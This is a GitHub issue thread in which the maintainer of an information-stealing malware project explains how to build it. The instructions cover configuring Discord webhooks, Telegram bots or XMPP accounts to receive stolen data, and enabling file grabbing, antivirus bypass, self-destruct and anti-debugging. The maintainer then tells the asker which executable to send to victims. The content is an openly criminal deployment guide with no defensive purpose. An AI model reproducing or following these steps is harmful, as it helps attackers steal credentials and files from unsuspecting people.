### ISSUE TITLE
How do I set up your virus manually if I want it to send results to my telegram.

### ISSUE THREAD

**Issue by Nick-Vinesmoke** [Nick-Vinesmoke/The-Murk-stealer#104]
How do I set up your virus manually if I want it to send results to my telegram.
Will I install python and what other modules should I install

_Originally posted by @Serverlog1 in https://github.com/Nick-Vinesmoke/The-Murk-stealer/issues/32#issuecomment-1751363896_

**Comment by Nick-Vinesmoke** [comment]
### 🔨Building(using builder)

### 🎮For Discord
__So firstly you need to download [python](https://www.python.org/downloads/). Then you need to download the builder [here](https://github.com/Nick-Vinesmoke/The-Murk-stealer/releases/tag/The_Murk_v9.2.7). 
After that, you need to create your Discord server and webhook there. [How to do it](https://hookdeck.com/webhooks/platforms/how-to-get-started-with-discord-webhooks#conclusion).
Finally, insert the name and webhook link in the builder. Better use building using pyarmor. And wait, secure building will take about 2 minutes.__

### 📨For Telegram
So firstly, go to the [@BotFather](https://t.me/BotFather) bot and create your own bot. Then, you need to save token and bot name. 
Now you need to get your chat id. To do this, go to the next bot [@ShowJsonBot](https://t.me/ShowJsonBot) and save the id.  
Insert this data in builder console. Better use building using pyarmor. And wait, secure building will take about 2 minutes.

---

### 🔨Building(manually)

### 🎮For Discord
Finally, insert the name and webhook link in the `config\config.py` here
```
enableFileGrabber = False #enable file grabber
oneStart = False #enable this if you want logs to come only from unique computers
avbypass = False #enable antiviruses bypass
selfDestruct = False #deletes itself after stealing
debuging = False #disable AntiDebug (do not change if you do not know what it is responsible for)

sendType = 0 # 0 via Discord; 1 via Telegram; 2 via XMPP
discordData = ["url of your WebHook","name of that WebHook"]
```
and run `CompileNuitka.bat` or `CompilePyarmor.bat` or `CompilePyinstaller.bat`

### 📨For Telegram
Finally, insert the name and webhook link in the `config\config.py` here
```
enableFileGrabber = False #enable file grabber
oneStart = False #enable this if you want logs to come only from unique computers
avbypass = False #enable antiviruses bypass
selfDestruct = False #deletes itself after stealing
debuging = False #disable AntiDebug (do not change if you do not know what it is responsible for)

sendType = 0 # 0 via Discord; 1 via Telegram; 2 via XMPP
TelegramData = ["HTTPAPI that you got from botFather","your chat ID"]
```
and run `CompileNuitka.bat` or `CompilePyarmor.bat` or `CompilePyinstaller.bat`

### 📡For XMPP
Finally, insert the name and webhook link in the `config\config.py` here
```
enableFileGrabber = False #enable file grabber
oneStart = False #enable this if you want logs to come only from unique computers
avbypass = False #enable antiviruses bypass
selfDestruct = False #deletes itself after stealing
debuging = False #disable AntiDebug (do not change if you do not know what it is responsible for)

sendType = 0 # 0 via Discord; 1 via Telegram; 2 via XMPP
xmppData = ["jabberid","jabberpassword","jabberreceiver"]
```
and run `CompileNuitka.bat` or `CompilePyarmor.bat` or `CompilePyinstaller.bat`

**Comment by Serverlog1** [comment]
I actually did all that but I don't figure out which file to send out for
victims

**Comment by Nick-Vinesmoke** [comment]
TheMurk.exe
